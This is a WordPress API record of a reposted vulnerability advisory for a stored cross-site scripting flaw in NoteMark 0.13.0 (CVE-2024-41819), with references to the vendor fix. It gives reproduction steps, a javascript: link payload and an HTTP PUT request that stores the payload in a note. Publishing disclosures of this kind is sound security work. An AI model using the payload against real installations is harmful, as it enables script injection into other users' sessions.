{"id":59234,"date":"2024-08-29T19:59:49","date_gmt":"2024-08-29T16:59:49","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180456\/notemark0130-xss.txt"},"modified":"2024-08-29T19:59:49","modified_gmt":"2024-08-29T16:59:49","slug":"notemark-0-13-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/notemark-0-13-0-cross-site-scripting\/","title":{"rendered":"Notemark 0.13.0 Cross Site Scripting"},"content":{"rendered":"<pre readability=\"8\"><code readability=\"10\"># Exploit Title: Stored XSS in NoteMark<br># Date: 07\/29\/2024<br># Exploit Author: Alessio Romano (sfoffo)<br># Vendor Homepage: https:\/\/notemark.docs.enchantedcode.co.uk\/<br># Version: 0.13.0 and below<br># Tested on: Linux<br># References:<br>https:\/\/notes.sfoffo.com\/contributions\/2024-contributions\/cve-2024-41819,<br>https:\/\/github.com\/enchant97\/note-mark\/commit\/a0997facb82f85bfb8c0d497606d89e7d150e182,<br>https:\/\/github.com\/enchant97\/note-mark\/security\/advisories\/GHSA-rm48-9mqf-8jc3<br># CVE: CVE-2024-41819<p>## Steps to Reproduce<br>1. Log in to the application.<br>2. Create a new note or enter a previously created note.<br>3. Access the note editor functionality from the selected note by clicking<br>on the \"Editor\" tab.<br>4. Input the following payload:<br>[xss-link](javascript:alert(1))<br>5. Save the changes.<br>6. Click on the \"Rendered\" tab to view the rendered markdown version of the<br>note. Click on the previously created link to pop the injected alert.<\/p><p>## HTTP Request PoC<\/p><p>PUT \/api\/notes\/&lt;note-uuid&gt;\/content HTTP\/1.1<br>Host: localhost:8000<br>Accept: *\/*<br>Content-Type: text\/plain;charset=UTF-8<br>Content-Length: 34<br>Sec-Fetch-Site: same-origin<br>Authorization: Bearer &lt;TOKEN&gt;<\/p>[xss-link](javascript:alert(1))<\/p><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Stored XSS in NoteMark# Date: 07\/29\/2024# Exploit Author: Alessio Romano (sfoffo)# Vendor Homepage: https:\/\/notemark.docs.enchantedcode.co.uk\/# Version: 0.13.0 and below# Tested on: Linux# References:https:\/\/notes.sfoffo.com\/contributions\/2024-contributions\/cve-2024-41819,https:\/\/github.com\/enchant97\/note-mark\/commit\/a0997facb82f85bfb8c0d497606d89e7d150e182,https:\/\/github.com\/enchant97\/note-mark\/security\/advisories\/GHSA-rm48-9mqf-8jc3# CVE: CVE-2024-41819## Steps to Reproduce1. Log in to the application.2. Create a new note or enter a previously created note.3. Access the note editor functionality from the selected note by &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59234","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59234","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59234"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59234\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59234"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59234"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59234"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}